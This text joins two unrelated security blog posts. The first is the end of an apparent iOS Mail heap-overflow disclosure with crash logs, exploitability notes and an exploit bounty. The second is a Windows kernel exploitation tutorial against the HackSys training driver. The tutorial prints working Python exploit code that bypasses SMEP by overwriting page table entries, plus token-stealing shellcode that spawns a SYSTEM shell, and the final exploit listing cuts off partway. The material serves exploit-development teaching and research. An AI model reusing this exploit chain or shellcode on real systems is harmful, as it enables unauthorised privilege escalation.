   x24: 0x000000000000152b  x25: 0x0000000000000000  x26: 0x0000000000000000  x27: 0x00000001149af400
   x28: 0x000000018dbd34bc   fp: 0x000000016da4c720   lr: 0x00000001947ae104
    sp: 0x000000016da4c720   pc: 0x00000001834a5a80 cpsr: 0x80000000

With [a] and [b] we know that the process crashed inside “memmove” called by “-[MFMutableData appendBytes:length:]”, which means the value of “copy_dst” is an invalid address at first place which is 0x4a35630e.

So where did the value of the register x0 (0x4a35630e) come from? It’s much smaller than the lowest valid address. 

Turns out that the process crashed when after failing to mmap a file and then failing to allocate the 8 byte memory at the same time. 

The invalid address 0x4a35630e is actually the offset which is the length of MFMutableData before triggering the vulnerability(i.e. “old_len”). When calloc fails to allocate the memory it returns NULL, so the copy_dst will be “0 + old_len(0x4a35630e)”. 

In this case the “old_len” is about 1.2GB which matches the average length of our POC which is likely to cause mmap failure and trigger the vulnerability.

Please note that x8-x15, and x0 are fully controlled by the sender.

The crash gives us another answer for our question above: “What if we accumulate too much data before triggering the vulnerability?” – The allocation of the 8-bytes memory could fail and crash while copying the payload to an invalid address. This can make reliable exploitation more difficult, as we may crash before taking over the program counter.

A Blast From The Past: Mysterious Trigger on iOS 3.1.3 in 2010!

Noteworthy, we found a public example of exactly a similar trigger by an anonymous user in modmy.com forums: https://forums.modmy.com/native-iphone-ipod-touch-app-launches-f29/734050-mail-app-keeps-crashing-randomly.html

Vulnerable version: iOS 3.1.3 on iPhone 2G
Time of crash: 22nd of October, 2010

The user “shyamsandeep”, registered on the 12th of June 2008 and last logged in on the 16th of October 2011 and had a single post in the forum, which contained this exact trigger.

This crash had r0 equal to 0x037ea000, which could be the result of the 1st vulnerability we disclosed in our previous blog which was due to ftruncate() failure. Interestingly, as we explained in the first case, it could also be a result of the allocation of 8-bytes memory failure however it is not possible to determine the exact reason since the log lacked memory regions information. Nonetheless, it is certain that there were triggers in the wild for this exploitable vulnerability since 2010.

Identifier: MobileMail
Version: ??? (???)
Code Type: ARM (Native)
Parent Process: launchd [1]

Date/Time: 2010-10-22 08:14:31.640 +0530
OS Version: iPhone OS 3.1.3 (7E18)
Report Version: 104

Exception Type: EXC_BAD_ACCESS (SIGSEGV) Exception Codes: KERN_INVALID_ADDRESS at 0x037ea000 Crashed Thread: 4
Thread 4 Crashed:
0 libSystem.B.dylib 0x33aaef3c 0x33aad000 + 7996 //memcpy + 0x294
1 MIME 0x30a822a4 0x30a7f000 + 12964 //_FastMemoryMove + 0x44
2 MIME 0x30a8231a 0x30a7f000 + 13082 // -[MFMutableData appendBytes:length:] + 0x6a
3 MIME 0x30a806d6 0x30a7f000 + 5846 // -[MFMutableData appendData:] + 0x32
4 Message 0x342e2938 0x34251000 + 596280 // -[DAMessageContentConsumer consumeData:length:format:mailMessage:] + 0x25c
5 Message 0x342e1ff8 0x34251000 + 593912 // -[DAMailAccountSyncConsumer consumeData:length:format:mailMessage:] +0x24
6 DataAccess 0x34146b22 0x3413e000 + 35618 // -[ASAccount
folderItemsSyncTask:handleStreamOperation:forCodePage:tag:withParentItem:withData:dataLength:] + 0x162
7 DataAccess 0x3416657c 0x3413e000 + 165244 //[ASFolderItemsSyncTaskhandleStreamOperation:forCodePage:tag:withParentIt em:withData:dataLength:] + 0x108
...

Thread 4 crashed with ARM Thread State:
r0: 0x037ea000 r1: 0x008729e0 r2: 0x00002205 r3: 0x4e414153
r4: 0x41415367 r5: 0x037e9825 r6: 0x00872200 r7: 0x007b8b78
r8: 0x0001f825 r9: 0x001fc098 r10: 0x00872200 r11: 0x0087c200
ip: 0x0000068a sp: 0x007b8b6c lr: 0x30a822ab pc: 0x33aaef3c
cpsr: 0x20000010

Case 2

Following is another crash that happened after an email was received and processed.

Coalition:           com.apple.mobilemail [308]

Exception Type:  EXC_BAD_ACCESS (SIGSEGV)
Exception Subtype: KERN_INVALID_ADDRESS at 0x0041004100410041 // [a]
VM Region Info: 0x41004100410041 is not in any region.  Bytes after previous region: 18296140473139266  
      REGION TYPE                      START - END             [ VSIZE] PRT/MAX SHRMOD  REGION DETAIL
      mapped file            00000002d31f0000-00000002d6978000 [ 55.5M] r--/rw- SM=COW  ...t_id=9bfc1855
--->  
      UNUSED SPACE AT END

Thread 13 name:  Dispatch queue: Internal _UICache queue
Thread 13 Crashed:
0   libobjc.A.dylib               	0x00000001b040fca0 objc_release  + 16
       0x1b040fc94         mov x29, sp                    
       0x1b040fc98         cbz x0, 0x0093fce4             
       0x1b040fc9c         tbnz x0, #63, 0x0093fce4       
       0x1b040fca0         ldr x8, [x0]            // [b]       
       0x1b040fca4         and x8, x8, 0xffffffff8        
       0x1b040fca8         ldrb w8, [x8, #32]             
       0x1b040fcac         tbz w8, #2, 0x0093fd14         

1   CoreFoundation                	0x00000001b1119408 -[__NSDictionaryM removeAllObjects]  + 600
2   libdispatch.dylib             	0x00000001b0c5d7d4 _dispatch_client_callout  + 16
3   libdispatch.dylib             	0x00000001b0c0bc1c _dispatch_lane_barrier_sync_invoke_and_complete  + 56    
4   UIFoundation                  	0x00000001bb9136b0 __16-[_UICache init]_block_invoke  + 76     
5   libdispatch.dylib             	0x00000001b0c5d7d4 _dispatch_client_callout  + 16
6   libdispatch.dylib             	0x00000001b0c0201c _dispatch_continuation_pop$VARIANT$mp  + 412
7   libdispatch.dylib             	0x00000001b0c11fa8 _dispatch_source_invoke$VARIANT$mp  + 1308
8   libdispatch.dylib             	0x00000001b0c0ee00 _dispatch_kevent_worker_thread  + 1224   
9   libsystem_pthread.dylib       	0x00000001b0e3e124 _pthread_wqthread  + 320          
10  libsystem_pthread.dylib       	0x00000001b0e40cd4 start_wqthread  + 4 


Thread 13 crashed with ARM Thread State (64-bit):
    x0: 0x0041004100410041   x1: 0x00000001de1ac18a   x2: 0x0000000000000000   x3: 0x0000000000000010
    x4: 0x00000001b0c60388   x5: 0x0000000000000010   x6: 0x0000000000000000   x7: 0x0000000000000000
    x8: 0x0000000281f94090   x9: 0x00000001b143f670  x10: 0x0000000142846800  x11: 0x0000004b0000007f
   x12: 0x00000001428468a0  x13: 0x000041a1eb487861  x14: 0x0000000283ed9d10  x15: 0x0000000000000004
   x16: 0x00000001eb487860  x17: 0x00000001b11191b0  x18: 0x0000000000000000  x19: 0x0000000281dce4c0
   x20: 0x0000000282693398  x21: 0x0000000282693330  x22: 0x0000000000000000  x23: 0x0000000000000000
   x24: 0x0000000281dce4c8  x25: 0x000000000c000000  x26: 0x000000000000000d  x27: 0x00000001eb48e000
   x28: 0x0000000282693330   fp: 0x000000016b8fe820   lr: 0x00000001b1119408
    sp: 0x000000016b8fe820   pc: 0x00000001b040fca0 cpsr: 0x20000000

[a]: The pointer of the object was overwritten with “0x0041004100410041” which is AAAA in unicode. 

[b] is one of the instructions around the crashed address we’ve added for better understanding, the process crashed on instruction “ldr x8, [x0]” while -[__NSDictionaryM removeAllObjects] was trying to release one the objects.

By reverse engineering -[__NSDictionaryM removeAllObjects], we understand that register x0 was loaded from x28(0x0000000282693330), since register x28 was never changed before the crash.

Let’s take a look at the virtual memory region information of x28: 0x0000000282693330, the overwritten object was stored in MALLOC_NANO region which stores small heap chunks. The heap overflow vulnerability corrupts the same region since it overflows on a 8-bytes heap chunk which is also stored in MALLOC_NANO.

  MALLOC_NANO         	 0x0000000280000000-0x00000002a0000000	 rw-/rwx

This crash is actually pretty close to controlling the PC since it controls the pointer of an Objective-C object. By pointing the value of register x0 to a memory sprayed with a fake object and class with fake method cache, the attackers could control the PC pointer, this phrack blog explains the details.

Summary

  1. It is rare to see that user-provided inputs trigger and control remote vulnerabilities. 
  2. We prove that it is possible to exploit this vulnerability using the described technique.
  3. We have observed real world triggers with a large allocation size.
  4. We have seen real world triggers with values that are controlled by the sender.
  5. The emails we looked for were missing / deleted.
  6. Success-rate can be improved. This bug had in-the-wild triggers in 2010 on an iPhone 2G device.
  7. In our opinion, based on the above, this bug is worth an out of band patch.

How Can Apple Improve the Logs?

The lack of details in iOS logs and the lack of options to choose the granularity of the data  for both individuals and organizations need to change to get iOS to be on-par with MacOS, Linux, and Windows capabilities. In general, the concept of hacking into a phone in order to analyze it, is completely flawed and should not  be the normal way to do it.

We suggest Apple improve its error diagnostics process to help individuals, organizations, and SOCs to investigate their devices. We have a few helpful technical suggestions:

  1. Crashes improvement: Enable to see memory next to each pointer / register
  2. Crashes improvement: Show stack / heap memory / memory near registers
  3. Add PIDs/PPIDs/UID/EUID to all applicable events
  4. Ability to send these logs to a remote server without physically connecting the phone – we are aware of multiple cases where the logs were mysteriously deleted
  5. Ability to perform complete digital forensics analysis of suspected iOS devices without a need to hack into the device first.

Questions for Apple

  • How many triggers have you seen to this heap overflow since iOS 3.1.3? 
  • How were you able to determine within one day that all of the triggers to this bug were not malicious and did you actually go over each event ? 
  • When are you planning to patch this vulnerability?
  • What are you going to do about enhancing forensics on mobile devices (see the list above)?

MailDemon Bounty

If you experienced any of the three symptoms below, use another mail application (e.g. Outlook for Desktop), and send the relevant emails (including the Email Source) to the address [email protected]– there are instructions at the bottom of this post.

Suspected emails may appear as follows:

Bounty details: We will validate if the email contains an exploit code. For the first two submissions containing Mail exploits that were verified by ZecOps team, we will provide:

  • $10,000 USD bounty
  • One license for ZecOps Gluon (DFIR for mobile devices) for 1 year
  • One license for ZecOps Neutrino (DFIR for endpoints and servers) for 1 year. 

We will provide an additional bounty of up to $7,337 for exploit primitive as described above.

We will determine what were the first two valid submissions according to the date they were received in our email server and if they contain an exploit code. A total of $27,337 USD in bounties and licenses of ZecOps Gluon & Neutrino. 

For suspicious submissions, we would also request device logs in order to determine other relevant information about potential attackers exploiting vulnerabilities in Mail and other vulnerabilities on the device.

Please note: Not every email that causes the symptoms above and shared with us will qualify for a bounty as there could be other bugs in MobileMail/maild – we’re only looking for ones that contain an attack.

How to send the emails using Outlook :

  1. Open Outlook from a computer and locate the relevant email
  2. Select Actions => Other Actions => View Source
  3. And send the source to [email protected]

How to send the suspicious email via Gmail:

  1. Locate and select the relevant message
  2. Click on the three dots “… “ in the menu and click on Forward as an attachment
  3. Send the email with the “.eml” attachment to [email protected]

* Please note that we haven’t published all details intentionally. This bug is still unpatched and we want to avoid further misuse of this bug

Exploit Development: Leveraging Page Table Entries for Windows Kernel Exploitation

2 May 2020 at 00:00

Introduction

Taking the prerequisite knowledge from my last blog post, let’s talk about additional ways to bypass SMEP other than flipping the 20th bit of the CR4 register - or completely circumventing SMEP all together by bypassing NX in the kernel! This blog post in particular will leverage page table entry control bits to bypass these kernel mode mitigations, as well as leveraging additional vulnerabilities such as an arbitrary read to bypass page table randomization to achieve said goals.

Before We Begin

Morten Schenk of Offensive Security has done a lot of the leg work for shedding light on this topic to the public, namely at DEF CON 25 and Black Hat 2017.

Although there has been some AMAZING research on this, I have not seen much in the way of practical blog posts showcasing this technique in the wild (that is, taking an exploit start to finish leveraging this technique in a blog post). Most of the research surrounding this topic, although absolutely brilliant, only explains how these mitigation bypasses work. This led to some issues for me when I started applying this research into actual exploitation, as I only had theory to go off of.

Since I had some trouble implementing said research into a practical example, I’m writing this blog post in hopes it will aid those looking for more detail on how to leverage these mitigation bypasses in a practical manner.

This blog post is going to utilize the HackSysExtreme vulnerable kernel driver to outline bypassing SMEP and bypassing NX in the kernel. The vulnerability class will be an arbitrary read/write primitive, which can write one QWORD to kernel mode memory per IOCTL routine.

Thank you to Ashfaq of HackSysTeam for this driver!

In addition to said information, these techniques will be utilized on a Windows 10 64-bit RS1 build. This is because Windows 10 RS2 has kernel Control Flow Guard (kCFG) enabled by default, which is beyond the scope of this post. This post simply aims to show the techniques used in today’s “modern exploitation era” to bypass SMEP or NX in kernel mode memory.

Why Go to the Mountain, If You Can Bring the Mountain to You?

The adage for the title of this section, comes from Spencer Pratt’s WriteProcessMemory() white paper about bypassing DEP. This saying, or adage, is extremely applicable to the method of bypassing SMEP through PTEs.

Let’s start with some psuedo code!

# Allocating user mode code
payload = kernel32.VirtualAlloc(
    c_int(0),                         # lpAddress
    c_int(len(shellcode)),            # dwSize
    c_int(0x3000),                    # flAllocationType
    c_int(0x40)                       # flProtect
)

---------------------------------------------------------

# Grabbing HalDispatchTable + 0x8 address
HalDispatchTable+0x8 = NTBASE + 0xFFFFFF

# Writing payload to HalDispatchTable + 0x8
www.What = payload
www.Where = HalDispatchTable + 0x8

---------------------------------------------------------

# Spawning SYSTEM shell
print "[+] Enjoy the NT AUTHORITY\SYSTEM shell!!!!"
os.system("cmd.exe /K cd C:\\")

Note, the above code is syntactically incorrect, but it is there nonetheless to help us understand what is going on.

Also, before moving on, write-what-where = arbitrary memory overwrite = arbitrary write primitive.

Carrying on, the above psuedo code snippet is allocating virtual memory in user mode, via VirtualAlloc(). Then, utilizing the write-what-where vulnerability in the kernel mode driver, the shellcode’s virtual address (residing in user mode), get’s written to nt!HalDispatchTable+0x8 (residing in kernel mode), which is a very common technique to use in an arbitrary memory overwrite situation.

Please refer to my last post on how this technique works.

As it stands now, execution of this code will result in an ATTEMPTED_EXECUTE_OF_NOEXECUTE_MEMORY Bug Check. This Bug Check is indicative of SMEP kicking in.

Letting the code execute, we can see this is the case.

Here, we can clearly see our shellcode has been allocated at 0x2620000

SMEP kicks in, and we can see the offending address is that of our user mode shellcode (Arg2 of PTE contents is highlighted as well. We will circle back to this in a moment).

Recall, from a previous blog of mine, that SMEP kicks in whenever code that resides in current privilege level (CPL 3) of the CPU (CPL 3 code = user mode code) is executed in context of CPL 0 (kernel mode).

SMEP is triggered in this case, as we are attempting to access the shellcode’s virtual address in user mode from nt!HalDispatchTable+0x8, which is in kernel mode.

But HOW is SMEP implemented is the real question.

SMEP is mandated/enabled through the OS via the 20th bit of the CR4 control register.

The 20th bit in the above image refers to the 1 in the beginning of CR4 register’s value of 0x170678, meaning SMEP is enabled on this system globally.

However, SMEP is ENFORCED on a per memory page basis, via the U/S PTE control bit. This is what we are going shift our focus to in this post.

Alex Ionescu gave a talk at Infiltrate 2015 about the implementation of SMEP on a per page basis.

Citing his slides, he explains that Intel has the following to say about SMEP enforcement on a per page basis.

“Any page level marked as supervisor (U/S=0) will result in treatment as supervisor for SMEP enforcement.”

Let’s take a look at the output of !pte in WinDbg of our user mode shellcode page to make sense of all of this!

What Intel means by the their statement in Alex’s talk, is that only ONE of the paging structure table entries (a page table entry) is needed to be set to kernel, in order for SMEP to not trigger. We do not need all 4 entries to be supervisor (kernel) mode!

This is wonderful for us, from an exploit development standpoint - as this GREATLY reduces our workload (we will see why shortly)!

Let’s learn how we can leverage this new knowledge, by first examining the current PTE control bits of our shellcode page:

  1. D - The “dirty” bit has been set, meaning a write to this address has occurred (KERNELBASE!VirtualAlloc()).
  2. A - The “access” bit has been set, meaning this address has been referenced at some point.
  3. U - The “user” bit has been set here. When the memory manager unit reads in this address, it recognizes is as a user mode address. When this bit is 1, the page is user mode. When this bit is clear, the page is kernel mode.
  4. W - The “write” bit has been set here, meaning this memory page is writable.
  5. E - The “executable” bit has been set here, meaning this memory page is executable.
  6. V - The “valid” bit is set here, meaning that the PTE is a valid PTE.

Notice that most of these control bits were set with our call earlier to KERNELBASE!VirtualAlloc() in the psuedo code snippet via the function’s arguments of flAllocationType and flProtect.

Where Do We Go From Here?

Let’s shift our focus to the PTE entry from the !pte command output in the last screenshot. We can see that our entry is that of a user mode page, from the U/S bit being set. However, what if we cleared this bit out?

If the U/S bit is set to 0, the page should become a kernel mode page, based on the aforementioned information. Let’s investigate this in WinDbg.

Rebooting our machine, we reallocate our shellcode in user mode.

The above image performs the following actions:

  1. Shows our shellcode in a user mode allocation at the virtual address 0xc60000
  2. Shows the current PTE and control bits for our shellcode memory page
  3. Uses ep in WinDbg to overwrite the pointer at 0xFFFFF98000006300 (this is the address of our PTE. When dereferenced, it contains the actual PTE control bits)
  4. Clears the PTE control bit for U/S by subtracting 4 from the PTE control bit contents.

    Note, I found this to be the correct value to clear the U/S bit through trial and error.

After the U/S bit is cleared out, our exploit continues by overwriting nt!HalDispatchTable+0x8 with the pointer to our shellcode.

The exploit continues, with a call to nt!KeQueryIntervalProfile(), which in turn, calls nt!HalDispatchTable+0x8

Stepping into the call qword ptr [nt!HalDispatchTable+0x8] instruction, we have hit our shellcode address and it has been loaded into RIP!

Executing the shellcode, results in manual bypass of SMEP!

Let’s refer back to the phraseology earlier in the post that uttered:

Why go to the mountain, if you can bring the mountain to you?

Notice how we didn’t “disable” SMEP like we did a few blog posts ago with ROP. All we did this time was just play by SMEP’s rules! We didn’t go to SMEP and try to disable it, instead, we brought our shellcode to SMEP and said “treat this as you normally treat kernel mode memory.”

This is great, we know we can bypass SMEP through this method! But the question remains, how can we achieve this dynamically?

After all, we cannot just arbitrarily use WinDbg when exploiting other systems.

Calculating PTEs

The previously shown method of bypassing SMEP manually in WinDbg revolved around the fact we could dereference the PTE address of our shellcode page in memory and extract the control bits. The question now remains, can we do this dynamically without a debugger?

Our exploit not only gives us the ability to arbitrarily write, but it gives us the ability to arbitrarily read in data as well! We will be using this read primitive to our advantage.

Windows has an API for just about anything! Fetching the PTE for an associated virtual address is no different. Windows has an API called nt!MiGetPteAddress that performs a specific formula to retrieve the associated PTE of a memory page.

The above function performs the following instructions:

  1. Bitwise shifts the contents of the RCX register to the right by 9 bits
  2. Moves the value of 0x7FFFFFFFF8 into RAX
  3. Bitwise AND’s the values of RCX and RAX together
  4. Moves the value of 0xFFFFFE0000000000 into RAX
  5. Adds the values of RAX and RCX
  6. Performs a return out of the function

Let’s take a second to break this down by importance. First things first, the number 0xFFFFFE0000000000 looks like it could potentially be important - as it resembles a 64-bit virtual memory address.

Turns out, this is important. This number is actually a memory address, and it is the base address of all of the PTEs! Let’s talk about the base of the PTEs for a second and its significance.

Rebooting the machine and disassembling the function again, we notice something.

0xFFFFFE0000000000 has now changed to 0xFFFF800000000000. The base of the PTEs has changed, it seems.

This is due to page table randomization, a mitigation of Windows 10. Microsoft definitely had the right idea to implement this mitigation, but it is not much of a use to be honest if the attacker already has an abitrary read primitive.

An attacker needs an arbitrary read primitive in the first place to extract the contents of the PTE control bits by dereferencing the PTE of a given memory page.

If an attacker already has this ability, the adversary could just use the same primitive to read in nt!MiGetPteAddress+0x13, which, when dereferenced, contains the base of the PTEs.

Again, not ripping on Microsoft - I think they honestly have some of the best default OS exploit mitigations in the business. Just something I thought of.

The method of reusing an arbitrary read primitive is actually what we are going to do here! But before we do, let’s talk about the PTE formula one last time.

As we saw, a bitwise shift right operation is performed on the contents of the RCX register. That is because when this function is called, the virtual address for the PTE you would like to fetch gets loaded into RCX.

We can mimic this same behavior in Python also!

# Bitwise shift shellcode virtual address to the right 9 bits
shellcode_pte = shellcode_virtual_address >> 9

# Bitwise AND the bitwise shifted right shellcode virtual address with 0x7ffffffff8
shellcode_pte &= 0x7ffffffff8

# Add the base of the PTEs to the above value (which will need to be previously extracted with an arbitrary read)
shellcode_pte += base_of_ptes

The variable shellcode_pte will now contain the PTE for our shellcode page! We can demonstrate this behavior in WinDbg.

Sorry for the poor screenshot above in advance.

But as we can see, our version of the formula works - and we know can now dynamically fetch a PTE address! The only question remains, how do we dynamically dereference nt!MiGetPteAddress+0x13 with an arbitrary read?

Read, Read, Read!

To use our arbitrary read, we are actually going to use our arbitrary write!

Our write-what-where primitive allows us to write a pointer (the what) to a pointer (the where). The school of thought here, is to write the address of nt!MiGetPteAddress+0x13 (the what) to a c_void_p() data type, which is Python’s representation of a C void pointer.

What will happen here is the following:

  1. Since the write portion of the write-what-where writes a POINTER (a.k.a the write will take a memory address and dereference it - which results in extracting the contents of a pointer), we will write the value of nt!MiGetPteAddress+0x13 somewhere we control. The write primitive will extract what nt!MiGetPteAddress+0x13 points to, which is the base of the PTEs, and write it somewhere we can fetch the result!
  2. The “where” value in the write-what-were vulnerability will write the “what” value (base of the PTEs) to a pointer (a.k.a if the “what” value (base of the PTEs) gets written to 0xFFFFFFFFFFFFFFFF, that means 0xFFFFFFFFFFFFFFFF will now POINT to the “what” value, which is the base of the PTEs).

The thought process here is, if we write the base of the PTEs to OUR OWN pointer that we create - we can then dereference our pointer and extract the contents ourselves!

Here is how this all looks in Python!

First, we declare a structure (one member for the “what” value, one member for the “where” value)

# Fist structure, for obtaining nt!MiGetPteAddress+0x13 value
class WriteWhatWhere_PTE_Base(Structure):
    _fields_ = [
        ("What_PTE_Base", c_void_p),
        ("Where_PTE_Base", c_void_p)
    ]

Secondly, we fetch the memory address of nt!MiGetPteAddress+0x13

Note - your offset from the kernel base to this function may be different!

# Retrieving nt!MiGetPteAddress (Windows 10 RS1 offset)
nt_mi_get_pte_address = kernel_address + 0x51214

# Base of PTEs is located at nt!MiGetPteAddress + 0x13
pte_base = nt_mi_get_pte_address + 0x13

Thirdly, we declare a c_void_p() to store the value pointed to by nt!MiGetPteAddress+0x13

# Creating a pointer in which the contents of nt!MiGetPteAddress+0x13 will be stored in to
# Base of the PTEs are stored here
base_of_ptes_pointer = c_void_p()

Fourthly, we initialize our structure with our “what” value and our “where” value which writes what the actual address of nt!MiGetPteAddress+0x13 points to (the base of the PTEs) into our declared pointer.

# Write-what-where structure #1
www_pte_base = WriteWhatWhere_PTE_Base()
www_pte_base.What_PTE_Base = pte_base
www_pte_base.Where_PTE_Base = addressof(base_of_ptes_pointer)
www_pte_pointer = pointer(www_pte_base)

Notice the where is the address of the pointer addressof(base_of_ptes_pointer). This is because we don’t want to overwrite the c_void_p’s address with anything - we want to store the value inside of the pointer.

This will store the value inside of the pointer because our write-what-where primitive writes a “what” value to a pointer.

Next, we make an IOCTL call to the routine that jumps to the arbitrary write in the driver.

# 0x002200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
kernel32.DeviceIoControl(
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    www_pte_pointer,                    # lpInBuffer
    0x8,                                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped
)

A little Python ctypes magic here on dereferencing pointers.

# CTypes way of dereferencing a C void pointer
base_of_ptes = struct.unpack('<Q', base_of_ptes_pointer)[0]

The above snippet of code will read in the c_void_p() (which contains the base of the PTEs) and store it in the variable base_of_ptes.

Utilizing the base of the PTEs, we can now dynamically retrieve the location of our shellcode’s PTE by putting all of the code together!

We have successfully defeated page table randomization!

Read, Read, Read… Again!

Now that we have dynamically resolved the PTE address for our shellcode, we need to use our arbitrary read again to dereference the shellcode’s PTE and extract the PTE control bits so we can modify the page table entry to be kernel mode.

Using the same primitive as above, we can use Python again to dynamically retrieve all of this!

Firstly, we need to create another structure (again, one member for “what” and one member for “where”).

# Second structure, for obtaining the control bits for the PTE
class WriteWhatWhere_PTE_Control_Bits(Structure):
    _fields_ = [
        ("What_PTE_Control_Bits", c_void_p),
        ("Where_PTE_Control_Bits", c_void_p)
    ]

Secondly, we declare another c_void_p.

shellcode_pte_bits_pointer = c_void_p()

Thirdly, we initialize our structure with the appropriate variables

# Write-what-where structure #2
www_pte_bits = WriteWhatWhere_PTE_Control_Bits()
www_pte_bits.What_PTE_Control_Bits = shellcode_pte
www_pte_bits.Where_PTE_Control_Bits = addressof(shellcode_pte_bits_pointer)
www_pte_bits_pointer = pointer(www_pte_bits)

We then make another call to the IOCTL responsible for the vulnerability.

Before executing our updated exploit, let’s restart the computer to prove everything is working dynamically.

Our combined code executes - resulting in the extraction of the PTE control bits!

Awesome! All that is left now that is to modify the U/S bit of the PTE control bits and then execute our shellcode!

Write, Write, Write!

Now that we have read in all of the information we need, it is time to modify the PTE of the shellcode memory page. To do this, all we need to do is subtract the extracted PTE control bits by 4.

# Currently, the PTE control bit for U/S of the shellcode is that of a user mode memory page
# Flipping the U (user) bit to an S (supervisor/kernel) bit
shellcode_pte_control_bits_kernelmode = shellcode_pte_control_bits_usermode - 4

Now we have successfully gotten the value we would like to write over our current PTE, it is time to actually make the write.

To do this, we first setup a structure, just like the read primitive.

# Third structure, to overwrite the U (user) PTE control bit to an S (supervisor/kernel) bit
class WriteWhatWhere_PTE_Overwrite(Structure):
    _fields_ = [
        ("What_PTE_Overwrite", c_void_p),
        ("Where_PTE_Overwrite", c_void_p)
    ]

This time, however, we store the PTE bits in a pointer so when the write occurs, it writes the bits instead of trying to extract the memory address of 2000000046b0f867 - which is not a valid address.

# Need to store the PTE control bits as a pointer
# Using addressof(pte_overwrite_pointer) in Write-what-where structure #4 since a pointer to the PTE control bits are needed
pte_overwrite_pointer = c_void_p(shellcode_pte_control_bits_kernelmode)

Then, we initialize the structure again.

# Write-what-where structure #4
www_pte_overwrite = WriteWhatWhere_PTE_Overwrite()
www_pte_overwrite.What_PTE_Overwrite = addressof(pte_overwrite_pointer)
www_pte_overwrite.Where_PTE_Overwrite = shellcode_pte
www_pte_overwrite_pointer = pointer(www_pte_overwrite)

After everything is good to go, we make another IOCTL call to trigger the vulnerability, and we successfully turn our user mode page into a kernel mode page dynamically!

Goodbye, SMEP (v2 ft. PTE Overwrite)!

All that is left to do now is execute our shellcode via nt!HalDispatchTable+0x8 and nt!KeQueryIntervalProfile(). Since I have already done a post outlining how this works, I will link you to it so you can see how this actually executes our shellcode. This blog post assumes the reader has minimal knowledge of arbitrary memory overwrites to begin with.

Here is the final exploit, which can also be found on my GitHub.

# HackSysExtreme Vulnerable Driver Kernel Exploit (x64 Arbitrary Overwrite/SMEP Enabled)
# Windows 10 RS1 - SMEP Bypass via PTE Overwrite
# Author: Connor McGarr

import struct
import sys
import os
from ctypes import *

kernel32 = windll.kernel32
ntdll = windll.ntdll
psapi = windll.Psapi

# Fist structure, for obtaining nt!MiGetPteAddress+0x13 value
class WriteWhatWhere_PTE_Base(Structure):
    _fields_ = [
        ("What_PTE_Base", c_void_p),
        ("Where_PTE_Base", c_void_p)
    ]

# Second structure, for obtaining the control bits for the PTE
class WriteWhatWhere_PTE_Control_Bits(Structure):
    _fields_ = [
        ("What_PTE_Control_Bits", c_void_p),
        ("Where_PTE_Control_Bits", c_void_p)
    ]

# Third structure, to overwrite the U (user) PTE control bit to an S (supervisor/kernel) bit
class WriteWhatWhere_PTE_Overwrite(Structure):
    _fields_ = [
        ("What_PTE_Overwrite", c_void_p),
        ("Where_PTE_Overwrite", c_void_p)
    ]

# Fourth structure, to overwrite HalDispatchTable + 0x8 with kernel mode shellcode page
class WriteWhatWhere(Structure):
    _fields_ = [
        ("What", c_void_p),
        ("Where", c_void_p)
    ]

# Token stealing payload
payload = bytearray(
    "\x65\x48\x8B\x04\x25\x88\x01\x00\x00"              # mov rax,[gs:0x188]  ; Current thread (KTHREAD)
    "\x48\x8B\x80\xB8\x00\x00\x00"                      # mov rax,[rax+0xb8]  ; Current process (EPROCESS)
    "\x48\x89\xC3"                                      # mov rbx,rax         ; Copy current process to rbx
    "\x48\x8B\x9B\xF0\x02\x00\x00"                      # mov rbx,[rbx+0x2f0] ; ActiveProcessLinks
    "\x48\x81\xEB\xF0\x02\x00\x00"                      # sub rbx,0x2f0       ; Go back to current process
    "\x48\x8B\x8B\xE8\x02\x00\x00"                      # mov rcx,[rbx+0x2e8] ; UniqueProcessId (PID)
    "\x48\x83\xF9\x04"                                  # cmp rcx,byte +0x4   ; Compare PID to SYSTEM PID
    "\x75\xE5"                                          # jnz 0x13            ; Loop until SYSTEM PID is found
    "\x48\x8B\x8B\x58\x03\x00\x00"                      # mov rcx,[rbx+0x358] ; SYSTEM token is @ offset _EPROCESS + 0x358
    "\x80\xE1\xF0"                                      # and cl, 0xf0        ; Clear out _EX_FAST_REF RefCnt
    "\x48\x89\x88\x58\x03\x00\x00"                      # mov [rax+0x358],rcx ; Copy SYSTEM token to current process
    "\x48\x31\xC0"                                      # xor rax,rax         ; set NTSTATUS SUCCESS
    "\xC3"                                              # ret                 ; Done!
)

# Defeating DEP with VirtualAlloc. Creating RWX memory, and copying the shellcode in that region.
print "[+] Allocating RWX region for shellcode"
ptr = kernel32.VirtualAlloc(
    c_int(0),                         # lpAddress
    c_int(len(payload)),              # dwSize
    c_int(0x3000),                    # flAllocationType
    c_int(0x40)                       # flProtect
)

# Creates a ctype variant of the payload (from_buffer)
c_type_buffer = (c_char * len(payload)).from_buffer(payload)

print "[+] Copying shellcode to newly allocated RWX region"
kernel32.RtlMoveMemory(
    c_int(ptr),                       # Destination (pointer)
    c_type_buffer,                    # Source (pointer)
    c_int(len(payload))               # Length
)

# Print update statement for shellcode location
print "[+] Shellcode is located at {0}".format(hex(ptr))

# Creating a pointer for the shellcode (write-what-where writes a pointer to a pointer)
# Using addressof(shellcode_pointer) in Write-what-where structure #5
shellcode_pointer = c_void_p(ptr)

# c_ulonglong because of x64 size (unsigned __int64)
base = (c_ulonglong * 1024)()

print "[+] Calling EnumDeviceDrivers()..."
get_drivers = psapi.EnumDeviceDrivers(
    byref(base),                      # lpImageBase (array that receives list of addresses)
    sizeof(base),                     # cb (size of lpImageBase array, in bytes)
    byref(c_long())                   # lpcbNeeded (bytes returned in the array)
)

# Error handling if function fails
if not base:
    print "[+] EnumDeviceDrivers() function call failed!"
    sys.exit(-1)

# The first entry in the array with device drivers is ntoskrnl base address
kernel_address = base[0]

# Print update for ntoskrnl.exe base address
print "[+] Found kernel leak!"
print "[+] ntoskrnl.exe base address: {0}".format(hex(kernel_address))

# Phase 1: Grab the base of the PTEs via nt!MiGetPteAddress

# Retrieving nt!MiGetPteAddress (Windows 10 RS1 offset)
nt_mi_get_pte_address = kernel_address + 0x51214

# Print update for nt!MiGetPteAddress address 
print "[+] nt!MiGetPteAddress is located at: {0}".format(hex(nt_mi_get_pte_address))

# Base of PTEs is located at nt!MiGetPteAddress + 0x13
pte_base = nt_mi_get_pte_address + 0x13

# Print update for nt!MiGetPteAddress+0x13 address
print "[+] nt!MiGetPteAddress+0x13 is located at: {0}".format(hex(pte_base))

